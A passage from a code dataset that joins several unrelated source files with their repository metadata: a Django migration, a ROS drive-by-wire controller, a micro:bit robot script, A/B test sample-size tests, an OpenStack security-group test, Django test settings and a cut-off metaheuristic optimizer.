to='webmap.Status', on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='poi', name='properties', field=models.ManyToManyField(help_text='POI properties', to='webmap.Property', null=True, verbose_name='properties', blank=True), preserve_default=True, ), migrations.AddField( model_name='poi', name='status', field=models.ForeignKey(default=0, verbose_name='status', to='webmap.Status', help_text='POI status, determinse if it will be shown in map', on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='poi', name='updated_by', field=models.ForeignKey(related_name='poi_update', verbose_name='last updated by', blank=True, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='photo', name='poi', field=models.ForeignKey(related_name='photos', verbose_name='poi', to='webmap.Poi', on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='photo', name='updated_by', field=models.ForeignKey(related_name='photo_update', verbose_name='last updated by', blank=True, to=settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='marker', name='layer', field=models.ForeignKey(verbose_name='layer', to='webmap.Layer', on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='marker', name='status', field=models.ForeignKey(verbose_name='status', to='webmap.Status', on_delete=models.CASCADE), preserve_default=True, ), migrations.AddField( model_name='layer', name='status', field=models.ForeignKey(verbose_name='status', to='webmap.Status', on_delete=models.CASCADE), preserve_default=True, ), ]
true
true
f728d42a9fd315f1f87a7ea0ded8196af22dec63
5,396
py
Python
ros/src/twist_controller/dbw_node.py
roopakingole/CarND-Capstone
e286df9e1388a46240705df5175e46520082a3a0
[ "MIT" ]
null
null
null
ros/src/twist_controller/dbw_node.py
roopakingole/CarND-Capstone
e286df9e1388a46240705df5175e46520082a3a0
[ "MIT" ]
null
null
null
ros/src/twist_controller/dbw_node.py
roopakingole/CarND-Capstone
e286df9e1388a46240705df5175e46520082a3a0
[ "MIT" ]
null
null
null
#!/usr/bin/env python import rospy from std_msgs.msg import Bool from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport from geometry_msgs.msg import TwistStamped import math from twist_controller import Controller ''' You can build this node only after you have built (or partially built) the `waypoint_updater` node. You will subscribe to `/twist_cmd` message which provides the proposed linear and angular velocities. You can subscribe to any other message that you find important or refer to the document for list of messages subscribed to by the reference implementation of this node. One thing to keep in mind while building this node and the `twist_controller` class is the status of `dbw_enabled`. While in the simulator, its enabled all the time, in the real car, that will not be the case. This may cause your PID controller to accumulate error because the car could temporarily be driven by a human instead of your controller. We have provided two launch files with this node. Vehicle specific values (like vehicle_mass, wheel_base) etc should not be altered in these files. We have also provided some reference implementations for PID controller and other utility classes. You are free to use them or build your own. Once you have the proposed throttle, brake, and steer values, publish it on the various publishers that we have created in the `__init__` function. ''' class DBWNode(object): def __init__(self): rospy.init_node('dbw_node') vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35) fuel_capacity = rospy.get_param('~fuel_capacity', 13.5) brake_deadband = rospy.get_param('~brake_deadband', .1) decel_limit = rospy.get_param('~decel_limit', -5) accel_limit = rospy.get_param('~accel_limit', 1.) wheel_radius = rospy.get_param('~wheel_radius', 0.2413) wheel_base = rospy.get_param('~wheel_base', 2.8498) steer_ratio = rospy.get_param('~steer_ratio', 14.8) max_lat_accel = rospy.get_param('~max_lat_accel', 3.) max_steer_angle = rospy.get_param('~max_steer_angle', 8.) self.steer_pub = rospy.Publisher('/vehicle/steering_cmd', SteeringCmd, queue_size=1) self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd', ThrottleCmd, queue_size=1) self.brake_pub = rospy.Publisher('/vehicle/brake_cmd', BrakeCmd, queue_size=1) # TODO: Create `Controller` object self.controller = Controller(vehicle_mass=vehicle_mass, fuel_capacity=fuel_capacity, brake_deadband=brake_deadband, decel_limit=decel_limit, accel_limit=accel_limit, wheel_radius=wheel_radius, wheel_base=wheel_base, steer_ratio=steer_ratio, max_lat_accel=max_lat_accel, max_steer_angle=max_steer_angle) # TODO: Subscribe to all the topics you need to rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb) rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb) rospy.Subscriber('/current_velocity', TwistStamped, self.velocity_cb) self.current_vel = None self.curr_ang_vel = None self.dbw_enabled = None self.linear_vel = None self.angular_vel = None self.throttle = self.steering = self.brake = 0 self.loop() def loop(self): rate = rospy.Rate(50) # 50Hz while not rospy.is_shutdown(): # TODO: Get predicted throttle, brake, and steering using `twist_controller` # You should only publish the control commands if dbw is enabled if not None in (self.current_vel, self.linear_vel, self.angular_vel): self.throttle, self.brake, self.steering = self.controller.control(self.current_vel, self.dbw_enabled, self.linear_vel, self.angular_vel) if self.dbw_enabled: self.publish(self.throttle, self.brake, self.steering) rate.sleep() def dbw_enabled_cb(self, msg): self.dbw_enabled = msg def twist_cb(self, msg): self.linear_vel = msg.twist.linear.x self.angular_vel = msg.twist.angular.z def velocity_cb(self, msg): self.current_vel = msg.twist.linear.x def publish(self, throttle, brake, steer): tcmd = ThrottleCmd() tcmd.enable = True tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT tcmd.pedal_cmd = throttle self.throttle_pub.publish(tcmd) scmd = SteeringCmd() scmd.enable = True scmd.steering_wheel_angle_cmd = steer self.steer_pub.publish(scmd) bcmd = BrakeCmd() bcmd.enable = True bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE bcmd.pedal_cmd = brake self.brake_pub.publish(bcmd) if __name__ == '__main__': DBWNode()
42.488189
101
0.625093
import rospy from std_msgs.msg import Bool from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport from geometry_msgs.msg import TwistStamped import math from twist_controller import Controller class DBWNode(object): def __init__(self): rospy.init_node('dbw_node') vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35) fuel_capacity = rospy.get_param('~fuel_capacity', 13.5) brake_deadband = rospy.get_param('~brake_deadband', .1) decel_limit = rospy.get_param('~decel_limit', -5) accel_limit = rospy.get_param('~accel_limit', 1.) wheel_radius = rospy.get_param('~wheel_radius', 0.2413) wheel_base = rospy.get_param('~wheel_base', 2.8498) steer_ratio = rospy.get_param('~steer_ratio', 14.8) max_lat_accel = rospy.get_param('~max_lat_accel', 3.) max_steer_angle = rospy.get_param('~max_steer_angle', 8.) self.steer_pub = rospy.Publisher('/vehicle/steering_cmd', SteeringCmd, queue_size=1) self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd', ThrottleCmd, queue_size=1) self.brake_pub = rospy.Publisher('/vehicle/brake_cmd', BrakeCmd, queue_size=1) self.controller = Controller(vehicle_mass=vehicle_mass, fuel_capacity=fuel_capacity, brake_deadband=brake_deadband, decel_limit=decel_limit, accel_limit=accel_limit, wheel_radius=wheel_radius, wheel_base=wheel_base, steer_ratio=steer_ratio, max_lat_accel=max_lat_accel, max_steer_angle=max_steer_angle) rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb) rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb) rospy.Subscriber('/current_velocity', TwistStamped, self.velocity_cb) self.current_vel = None self.curr_ang_vel = None self.dbw_enabled = None self.linear_vel = None self.angular_vel = None self.throttle = self.steering = self.brake = 0 self.loop() def loop(self): rate = rospy.Rate(50) while not rospy.is_shutdown(): if not None in (self.current_vel, self.linear_vel, self.angular_vel): self.throttle, self.brake, self.steering = self.controller.control(self.current_vel, self.dbw_enabled, self.linear_vel, self.angular_vel) if self.dbw_enabled: self.publish(self.throttle, self.brake, self.steering) rate.sleep() def dbw_enabled_cb(self, msg): self.dbw_enabled = msg def twist_cb(self, msg): self.linear_vel = msg.twist.linear.x self.angular_vel = msg.twist.angular.z def velocity_cb(self, msg): self.current_vel = msg.twist.linear.x def publish(self, throttle, brake, steer): tcmd = ThrottleCmd() tcmd.enable = True tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT tcmd.pedal_cmd = throttle self.throttle_pub.publish(tcmd) scmd = SteeringCmd() scmd.enable = True scmd.steering_wheel_angle_cmd = steer self.steer_pub.publish(scmd) bcmd = BrakeCmd() bcmd.enable = True bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE bcmd.pedal_cmd = brake self.brake_pub.publish(bcmd) if __name__ == '__main__': DBWNode()
true
true
f728d4a4b2bf15aa63f77688d6594a23123c0835
1,301
py
Python
Dev/Tests/Whiskers_Roam_Expanded.py
parallaxinc/cyberbot
f7c4d355ee0310dcfef81027802cc41ac6ce90e1
[ "MIT" ]
4
2019-03-18T20:49:41.000Z
2022-03-24T01:44:36.000Z
Dev/Tests/Whiskers_Roam_Expanded.py
parallaxinc/cyberbot
f7c4d355ee0310dcfef81027802cc41ac6ce90e1
[ "MIT" ]
5
2019-06-07T18:09:27.000Z
2021-04-08T17:16:55.000Z
Dev/Tests/Whiskers_Roam_Expanded.py
parallaxinc/cyberbot
f7c4d355ee0310dcfef81027802cc41ac6ce90e1
[ "MIT" ]
null
null
null
# Whiskers_Roam_Expanded.py from cyberbot import * bot(22).tone(2000, 300) while True: left = bot(7).read_digital() right = bot(9).read_digital() if left == 1 and right == 1: #Go forward bot(18).servo_speed(75) bot(19).servo_speed(-75) display.show(Image.ARROW_S) bot(15).write_digital(0) bot(0).write_digital(0) elif left == 1 and right == 0: #Obstacle on right bot(18).servo_speed(-75) #back up for 1s, turn left bot(19).servo_speed(75) display.show(Image.ARROW_N) bot(15).write_digital(0) bot(0).write_digital(1) sleep(1000) bot(18).servo_speed(-75) bot(19).servo_speed(-75) display.show(Image.ARROW_E) sleep(600) elif left == 0 and right ==1: #Obstacle on left bot(18).servo_speed(-75) #backup for 1s, turn right bot(19).servo_speed(75) display.show(Image.ARROW_N) bot(15).write_digital(1) bot(0).write_digital(0) sleep(1000) bot(18).servo_speed(75) bot(19).servo_speed(75) display.show(Image.ARROW_W) sleep(600) elif left == 0 and right == 0: #Obstacle on left + right bot(18).servo_speed(-75) #backup for 1s, turn bot(19).servo_speed(75) display.show(Image.ARROW_N) bot(15).write_digital(1) bot(0).write_digital(1) sleep(1000) bot(18).servo_speed(75) bot(19).servo_speed(75) display.show(Image.ARROW_W) sleep(1000)
26.55102
57
0.693313
from cyberbot import * bot(22).tone(2000, 300) while True: left = bot(7).read_digital() right = bot(9).read_digital() if left == 1 and right == 1: bot(18).servo_speed(75) bot(19).servo_speed(-75) display.show(Image.ARROW_S) bot(15).write_digital(0) bot(0).write_digital(0) elif left == 1 and right == 0: bot(18).servo_speed(-75) bot(19).servo_speed(75) display.show(Image.ARROW_N) bot(15).write_digital(0) bot(0).write_digital(1) sleep(1000) bot(18).servo_speed(-75) bot(19).servo_speed(-75) display.show(Image.ARROW_E) sleep(600) elif left == 0 and right ==1: bot(18).servo_speed(-75) bot(19).servo_speed(75) display.show(Image.ARROW_N) bot(15).write_digital(1) bot(0).write_digital(0) sleep(1000) bot(18).servo_speed(75) bot(19).servo_speed(75) display.show(Image.ARROW_W) sleep(600) elif left == 0 and right == 0: bot(18).servo_speed(-75) bot(19).servo_speed(75) display.show(Image.ARROW_N) bot(15).write_digital(1) bot(0).write_digital(1) sleep(1000) bot(18).servo_speed(75) bot(19).servo_speed(75) display.show(Image.ARROW_W) sleep(1000)
true
true
f728d5be0024cc7a2e17aae74076499dffb5852e
3,971
py
Python
py/gps_building_blocks/analysis/exp_design/ab_testing_design_test.py
isabella232/gps_building_blocks
86ef8be60a42cd12e27696007589388b7b053f4f
[ "Apache-2.0" ]
null
null
null
py/gps_building_blocks/analysis/exp_design/ab_testing_design_test.py
isabella232/gps_building_blocks
86ef8be60a42cd12e27696007589388b7b053f4f
[ "Apache-2.0" ]
1
2021-06-18T14:42:25.000Z
2021-06-18T14:42:25.000Z
py/gps_building_blocks/analysis/exp_design/ab_testing_design_test.py
isabella232/gps_building_blocks
86ef8be60a42cd12e27696007589388b7b053f4f
[ "Apache-2.0" ]
null
null
null
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for gps_building_blocks.analysis.exp_design.ab_testing_design.""" from absl.testing import absltest import numpy as np from gps_building_blocks.analysis.exp_design import ab_testing_design BASELINE_CONVERSION_RATE_PERCENTAGE = 5 EXPECTED_UPLIFT_PERCENTAGE = 10 LABELS = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) PREDICTIONS = np.array([ 0.7, 0.63, 0.4, 0.77, 0.45, 0.8, 0.41, 0.82, 0.7, 0.6, 0.5, 0.45, 0.74, 0.11, 0.21, 0.05, 0.67, 0.79, 0.60, 0.10 ]) class ABTestingExperimentalDesignTest(absltest.TestCase): def test_calc_chisquared_sample_size_returns_correct_values(self): result_sample_size = ab_testing_design.calc_chisquared_sample_size( baseline_conversion_rate_percentage=BASELINE_CONVERSION_RATE_PERCENTAGE, expected_uplift_percentage=EXPECTED_UPLIFT_PERCENTAGE) self.assertEqual(result_sample_size, 14913.0) def test_calc_chisquared_sample_size_change_power_and_confidence(self): result_sample_size = ab_testing_design.calc_chisquared_sample_size( baseline_conversion_rate_percentage=BASELINE_CONVERSION_RATE_PERCENTAGE, expected_uplift_percentage=EXPECTED_UPLIFT_PERCENTAGE, power_percentage=90, confidence_level_percentage=99) self.assertEqual(result_sample_size, 28271.0) def test_calc_chisquared_sample_sizes_for_bins_returns_correct_values(self): results = ab_testing_design.calc_chisquared_sample_sizes_for_bins( labels=LABELS, probability_predictions=PREDICTIONS, number_bins=3) self.assertEqual(results.shape, (24, 7)) self.assertListEqual( list(results.columns), [ 'bin_number', 'bin_size', 'conv_rate_percentage', 'uplift_percentage', 'power_percentage', 'confidence_level_percentage', 'sample_size' ]) self.assertListEqual( list(results['sample_size']), [ 248.0, 314.0, 343.0, 421.0, 62.0, 79.0, 86.0, 106.0, 928.0, 1178.0, 1285.0, 1577.0, 232.0, 295.0, 322.0, 395.0, 1031.0, 1309.0, 1428.0, 1752.0, 258.0, 328.0, 357.0, 438.0 ]) def test_resulted_bin_metrics_does_not_contain_nas(self): results = ab_testing_design.calc_chisquared_sample_sizes_for_bins( labels=LABELS, probability_predictions=PREDICTIONS, number_bins=3) self.assertFalse(results.isna().values.any()) def test_calc_chisquared_sample_sizes_for_cumulative_bins_returns_right_vals( self): results = ab_testing_design.calc_chisquared_sample_sizes_for_cumulative_bins( labels=LABELS, probability_predictions=PREDICTIONS, number_bins=5) self.assertEqual(results.shape, (40, 8)) self.assertListEqual( list(results.columns), [ 'cumulative_bin_number', 'bin_size', 'bin_size_percentage', 'conv_rate_percentage', 'uplift_percentage', 'power_percentage', 'confidence_level_percentage', 'sample_size' ]) self.assertListEqual( list(results['sample_size']), [ 207.0, 262.0, 286.0, 351.0, 52.0, 66.0, 72.0, 88.0, 371.0, 471.0, 514.0, 631.0, 93.0, 118.0, 129.0, 158.0, 442.0, 561.0, 612.0, 751.0, 111.0, 141.0, 153.0, 188.0, 371.0, 471.0, 514.0, 631.0, 93.0, 118.0, 129.0, 158.0, 619.0, 785.0, 857.0, 1051.0, 155.0, 197.0, 215.0, 263.0 ]) if __name__ == '__main__': absltest.main()
41.8
81
0.706875
from absl.testing import absltest import numpy as np from gps_building_blocks.analysis.exp_design import ab_testing_design BASELINE_CONVERSION_RATE_PERCENTAGE = 5 EXPECTED_UPLIFT_PERCENTAGE = 10 LABELS = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) PREDICTIONS = np.array([ 0.7, 0.63, 0.4, 0.77, 0.45, 0.8, 0.41, 0.82, 0.7, 0.6, 0.5, 0.45, 0.74, 0.11, 0.21, 0.05, 0.67, 0.79, 0.60, 0.10 ]) class ABTestingExperimentalDesignTest(absltest.TestCase): def test_calc_chisquared_sample_size_returns_correct_values(self): result_sample_size = ab_testing_design.calc_chisquared_sample_size( baseline_conversion_rate_percentage=BASELINE_CONVERSION_RATE_PERCENTAGE, expected_uplift_percentage=EXPECTED_UPLIFT_PERCENTAGE) self.assertEqual(result_sample_size, 14913.0) def test_calc_chisquared_sample_size_change_power_and_confidence(self): result_sample_size = ab_testing_design.calc_chisquared_sample_size( baseline_conversion_rate_percentage=BASELINE_CONVERSION_RATE_PERCENTAGE, expected_uplift_percentage=EXPECTED_UPLIFT_PERCENTAGE, power_percentage=90, confidence_level_percentage=99) self.assertEqual(result_sample_size, 28271.0) def test_calc_chisquared_sample_sizes_for_bins_returns_correct_values(self): results = ab_testing_design.calc_chisquared_sample_sizes_for_bins( labels=LABELS, probability_predictions=PREDICTIONS, number_bins=3) self.assertEqual(results.shape, (24, 7)) self.assertListEqual( list(results.columns), [ 'bin_number', 'bin_size', 'conv_rate_percentage', 'uplift_percentage', 'power_percentage', 'confidence_level_percentage', 'sample_size' ]) self.assertListEqual( list(results['sample_size']), [ 248.0, 314.0, 343.0, 421.0, 62.0, 79.0, 86.0, 106.0, 928.0, 1178.0, 1285.0, 1577.0, 232.0, 295.0, 322.0, 395.0, 1031.0, 1309.0, 1428.0, 1752.0, 258.0, 328.0, 357.0, 438.0 ]) def test_resulted_bin_metrics_does_not_contain_nas(self): results = ab_testing_design.calc_chisquared_sample_sizes_for_bins( labels=LABELS, probability_predictions=PREDICTIONS, number_bins=3) self.assertFalse(results.isna().values.any()) def test_calc_chisquared_sample_sizes_for_cumulative_bins_returns_right_vals( self): results = ab_testing_design.calc_chisquared_sample_sizes_for_cumulative_bins( labels=LABELS, probability_predictions=PREDICTIONS, number_bins=5) self.assertEqual(results.shape, (40, 8)) self.assertListEqual( list(results.columns), [ 'cumulative_bin_number', 'bin_size', 'bin_size_percentage', 'conv_rate_percentage', 'uplift_percentage', 'power_percentage', 'confidence_level_percentage', 'sample_size' ]) self.assertListEqual( list(results['sample_size']), [ 207.0, 262.0, 286.0, 351.0, 52.0, 66.0, 72.0, 88.0, 371.0, 471.0, 514.0, 631.0, 93.0, 118.0, 129.0, 158.0, 442.0, 561.0, 612.0, 751.0, 111.0, 141.0, 153.0, 188.0, 371.0, 471.0, 514.0, 631.0, 93.0, 118.0, 129.0, 158.0, 619.0, 785.0, 857.0, 1051.0, 155.0, 197.0, 215.0, 263.0 ]) if __name__ == '__main__': absltest.main()
true
true
f728d6871fb41255044213a71f7eb015371377f1
4,096
py
Python
tempest/api/compute/admin/test_security_groups.py
vmahuli/tempest
f70319f5eda72b8c8a913ae1002ec531324e4116
[ "Apache-2.0" ]
null
null
null
tempest/api/compute/admin/test_security_groups.py
vmahuli/tempest
f70319f5eda72b8c8a913ae1002ec531324e4116
[ "Apache-2.0" ]
null
null
null
tempest/api/compute/admin/test_security_groups.py
vmahuli/tempest
f70319f5eda72b8c8a913ae1002ec531324e4116
[ "Apache-2.0" ]
null
null
null
# Copyright 2013 NTT Data # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import testtools from tempest.api.compute import base from tempest.common.utils import data_utils from tempest import config from tempest import test CONF = config.CONF class SecurityGroupsTestAdminJSON(base.BaseV2ComputeAdminTest): @classmethod def setUpClass(cls): super(SecurityGroupsTestAdminJSON, cls).setUpClass() cls.adm_client = cls.os_adm.security_groups_client cls.client = cls.security_groups_client def _delete_security_group(self, securitygroup_id, admin=True): if admin: resp, _ = self.adm_client.delete_security_group(securitygroup_id) else: resp, _ = self.client.delete_security_group(securitygroup_id) self.assertEqual(202, resp.status) @testtools.skipIf(CONF.service_available.neutron, "Skipped because neutron do not support all_tenants" "search filter.") @test.attr(type='smoke') def test_list_security_groups_list_all_tenants_filter(self): # Admin can list security groups of all tenants # List of all security groups created security_group_list = [] # Create two security groups for a non-admin tenant for i in range(2): name = data_utils.rand_name('securitygroup-') description = data_utils.rand_name('description-') resp, securitygroup = (self.client .create_security_group(name, description)) self.assertEqual(200, resp.status) self.addCleanup(self._delete_security_group, securitygroup['id'], admin=False) security_group_list.append(securitygroup) client_tenant_id = securitygroup['tenant_id'] # Create two security groups for admin tenant for i in range(2): name = data_utils.rand_name('securitygroup-') description = data_utils.rand_name('description-') resp, adm_securitygroup = (self.adm_client .create_security_group(name, description)) self.assertEqual(200, resp.status) self.addCleanup(self._delete_security_group, adm_securitygroup['id']) security_group_list.append(adm_securitygroup) # Fetch all security groups based on 'all_tenants' search filter param = {'all_tenants': 'true'} resp, fetched_list = self.adm_client.list_security_groups(params=param) self.assertEqual(200, resp.status) sec_group_id_list = map(lambda sg: sg['id'], fetched_list) # Now check if all created Security Groups are present in fetched list for sec_group in security_group_list: self.assertIn(sec_group['id'], sec_group_id_list) # Fetch all security groups for non-admin user with 'all_tenants' # search filter resp, fetched_list = self.client.list_security_groups(params=param) self.assertEqual(200, resp.status) # Now check if all created Security Groups are present in fetched list for sec_group in fetched_list: self.assertEqual(sec_group['tenant_id'], client_tenant_id, "Failed to get all security groups for " "non admin user.") class SecurityGroupsTestAdminXML(SecurityGroupsTestAdminJSON): _interface = 'xml'
42.666667
79
0.654541
import testtools from tempest.api.compute import base from tempest.common.utils import data_utils from tempest import config from tempest import test CONF = config.CONF class SecurityGroupsTestAdminJSON(base.BaseV2ComputeAdminTest): @classmethod def setUpClass(cls): super(SecurityGroupsTestAdminJSON, cls).setUpClass() cls.adm_client = cls.os_adm.security_groups_client cls.client = cls.security_groups_client def _delete_security_group(self, securitygroup_id, admin=True): if admin: resp, _ = self.adm_client.delete_security_group(securitygroup_id) else: resp, _ = self.client.delete_security_group(securitygroup_id) self.assertEqual(202, resp.status) @testtools.skipIf(CONF.service_available.neutron, "Skipped because neutron do not support all_tenants" "search filter.") @test.attr(type='smoke') def test_list_security_groups_list_all_tenants_filter(self): security_group_list = [] for i in range(2): name = data_utils.rand_name('securitygroup-') description = data_utils.rand_name('description-') resp, securitygroup = (self.client .create_security_group(name, description)) self.assertEqual(200, resp.status) self.addCleanup(self._delete_security_group, securitygroup['id'], admin=False) security_group_list.append(securitygroup) client_tenant_id = securitygroup['tenant_id'] for i in range(2): name = data_utils.rand_name('securitygroup-') description = data_utils.rand_name('description-') resp, adm_securitygroup = (self.adm_client .create_security_group(name, description)) self.assertEqual(200, resp.status) self.addCleanup(self._delete_security_group, adm_securitygroup['id']) security_group_list.append(adm_securitygroup) param = {'all_tenants': 'true'} resp, fetched_list = self.adm_client.list_security_groups(params=param) self.assertEqual(200, resp.status) sec_group_id_list = map(lambda sg: sg['id'], fetched_list) for sec_group in security_group_list: self.assertIn(sec_group['id'], sec_group_id_list) resp, fetched_list = self.client.list_security_groups(params=param) self.assertEqual(200, resp.status) for sec_group in fetched_list: self.assertEqual(sec_group['tenant_id'], client_tenant_id, "Failed to get all security groups for " "non admin user.") class SecurityGroupsTestAdminXML(SecurityGroupsTestAdminJSON): _interface = 'xml'
true
true
f728d7023209795915e43579b9727a3dcfc2c293
1,702
py
Python
config/settings/test.py
tigrinustrade/humantech_prueba
065a3a8cf4eca079a781c88322854fae2c9dcda8
[ "MIT" ]
null
null
null
config/settings/test.py
tigrinustrade/humantech_prueba
065a3a8cf4eca079a781c88322854fae2c9dcda8
[ "MIT" ]
null
null
null
config/settings/test.py
tigrinustrade/humantech_prueba
065a3a8cf4eca079a781c88322854fae2c9dcda8
[ "MIT" ]
null
null
null
""" With these settings, tests run faster. """ from .base import * # noqa from .base import env # GENERAL # ------------------------------------------------------------------------------ # https://docs.djangoproject.com/en/dev/ref/settings/#secret-key SECRET_KEY = env( "DJANGO_SECRET_KEY", default="UwkbY3fgeFHTlZrfDxa8T2C1sL8GY1HfTMmZarA4SXAdF1Q3TwsCt7bsNMNEaRyn", ) # https://docs.djangoproject.com/en/dev/ref/settings/#test-runner TEST_RUNNER = "django.test.runner.DiscoverRunner" # CACHES # ------------------------------------------------------------------------------ # https://docs.djangoproject.com/en/dev/ref/settings/#caches CACHES = { "default": { "BACKEND": "django.core.cache.backends.locmem.LocMemCache", "LOCATION": "", } } # PASSWORDS # ------------------------------------------------------------------------------ # https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers PASSWORD_HASHERS = ["django.contrib.auth.hashers.MD5PasswordHasher"] # TEMPLATES # ------------------------------------------------------------------------------ TEMPLATES[-1]["OPTIONS"]["loaders"] = [ # type: ignore[index] # noqa F405 ( "django.template.loaders.cached.Loader", [ "django.template.loaders.filesystem.Loader", "django.template.loaders.app_directories.Loader", ], ) ] # EMAIL # ------------------------------------------------------------------------------ # https://docs.djangoproject.com/en/dev/ref/settings/#email-backend EMAIL_BACKEND = "django.core.mail.backends.locmem.EmailBackend" # Your stuff... # ------------------------------------------------------------------------------
32.730769
80
0.49765
from .base import * from .base import env = env( "DJANGO_SECRET_KEY", default="UwkbY3fgeFHTlZrfDxa8T2C1sL8GY1HfTMmZarA4SXAdF1Q3TwsCt7bsNMNEaRyn", ) = "django.test.runner.DiscoverRunner" = { "default": { "BACKEND": "django.core.cache.backends.locmem.LocMemCache", "LOCATION": "", } } = ["django.contrib.auth.hashers.MD5PasswordHasher"] TEMPLATES[-1]["OPTIONS"]["loaders"] = [ "django.template.loaders.cached.Loader", [ "django.template.loaders.filesystem.Loader", "django.template.loaders.app_directories.Loader", ], ) ] = "django.core.mail.backends.locmem.EmailBackend"
true
true
f728d9b17682bd804bb3615a11c5e2ce2f618a85
11,026
py
Python
mealpy/fake/RHO.py
ashishpatel26/mealpy
62160e61b8bd4b084e44b80fda720e6bd6332e03
[ "MIT" ]
1
2021-05-20T06:53:08.000Z
2021-05-20T06:53:08.000Z
mealpy/fake/RHO.py
chenyuxiang0425/mealpy
69e8dc727e15527e31ac5ace1debe92a0bc7d828
[ "MIT" ]
null
null
null
mealpy/fake/RHO.py
chenyuxiang0425/mealpy
69e8dc727e15527e31ac5ace1debe92a0bc7d828
[ "MIT" ]
1
2020-09-30T21:14:33.000Z
2020-09-30T21:14:33.000Z
#!/usr/bin/env python # ------------------------------------------------------------------------------------------------------% # Created by "Thieu Nguyen" at 14:53, 17/03/2020 % # % # Email: nguyenthieu2102@gmail.com % # Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 % # Github: https://github.com/thieu1995 % #-------------------------------------------------------------------------------------------------------% from numpy.random import uniform, normal from numpy.linalg import norm from numpy import exp, power, pi, zeros, array, mean, ones, dot from math import gamma from copy import deepcopy from mealpy.root import Root class OriginalRHO(Root): """ The original version of: Rhino Herd Optimization (RHO) (A Novel Metaheuristic Algorithm inspired by Rhino Herd Behavior) Link: https://doi.org/10.3384/ecp171421026 """ def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1): Root.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose) self.epoch = epoch self.pop_size = pop_size self.c = c # shape parameter - default = 0.53 > 0 self.a = a # scale parameter - default = 2831 > 0 self.r = r # default = 0.04 self.A = A # the area of each grid cell - default = 1 def train(self): pop = [self.create_solution() for _ in range(self.pop_size)] g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB) # Epoch loop for epoch in range(self.epoch): pos_list = array([item[self.ID_POS] for item in pop]) fit_list = array([item[self.ID_FIT] for item in pop]) fx_list = deepcopy(fit_list) pos_center = mean(pos_list, axis=0) ## Each individual loop for i in range(0, self.pop_size): # Eq. 1 exp_component = -1 * power(norm(pop[i][self.ID_POS] - pos_center) / self.a, 2.0 / self.c) fx = 2 * exp(exp_component) / (self.c ** 2 * pi * self.a ** 2 * gamma(self.c)) fx_list[i] = fx # Eq. 7 s_component = ones(self.problem_size) for j in range(0, self.problem_size): sum_temp = 0 for i in range(0, self.pop_size): sum_temp += fx_list[i] * (1 + pop[i][self.ID_POS][j] / (self.EPSILON + pop[i][self.ID_FIT])) s_component[j] = self.A * sum_temp for i in range(0, self.pop_size): x_new = pop[i][self.ID_POS] for j in range(0, self.problem_size): # Eq. 7 s_x = fx_list[i] * (1 + pop[i][self.ID_FIT] * pop[i][self.ID_POS][j]) / s_component[j] # Eq. 9 if uniform() <= 0.5: x_new[j] = pop[i][self.ID_POS][j] - uniform() * s_x * pop[i][self.ID_POS][j] else: x_new[j] = pop[i][self.ID_POS][j] + uniform() * s_x * pop[i][self.ID_POS][j] x_new = self.amend_position_faster(x_new) fit = self.get_fitness_position(x_new) if fit < pop[i][self.ID_FIT]: pop[i] = [x_new, fit] g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best) self.loss_train.append(g_best[self.ID_FIT]) if self.verbose: print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT])) self.solution = g_best return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train class BaseRHO(Root): """ My version of: Rhino Herd Optimization (RHO) (A Novel Metaheuristic Algorithm inspired by Rhino Herd Behavior) Notes: + Remove third loop """ def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100, c=0.53, a=2831, r=0.04, A=1): Root.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose) self.epoch = epoch self.pop_size = pop_size self.c = c # shape parameter - default = 0.53 > 0 self.a = a # scale 